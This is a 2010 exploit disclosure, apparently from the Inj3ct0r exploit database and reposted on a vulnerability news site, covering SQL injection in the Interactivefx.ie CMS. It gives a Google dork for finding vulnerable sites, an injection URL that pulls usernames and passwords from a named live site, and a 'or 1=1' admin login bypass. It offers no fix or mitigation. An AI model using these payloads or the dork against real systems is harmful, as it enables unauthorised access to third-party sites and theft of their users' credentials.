Security Advisory: Interactivefx.ie CMS SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Aris AGX agXchange ESM Cross Site Scripting Vulnerability
  There is a Permanent-type Cross-Site Vulnerability in “Personal Signature” in all version of Discuz!. It can be written by the worm!
  Multiple Vulnerabilities in EASY Enterprise DMS
  justVisual 2.0 (index.php) <= LFI Vulnerability

From: Inj3ct0r.com <inj3ct0r_(at)_list.ru>
Date: 25.03.2010
Subject: Interactivefx.ie CMS SQL Injection Vulnerability

================================================
Interactivefx.ie CMS SQL Injection Vulnerability
================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __ /'__`\        /\ \__ /'__`\                   0
0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Site product: Interactivefx.ie
Product : Interactivefx.ie CMS
Google dork: "Copyright Interactivefx.ie"

Sql Inj3ct0r Exploit:

http://www.garterlane.ie/event-details.php?id=223'+select+username,
password+from+users/*

Bypass authentication in admin panel:

login: or 1=1/*
pass: anypassyouwish

# Inj3ct0r.com [2010-03-25]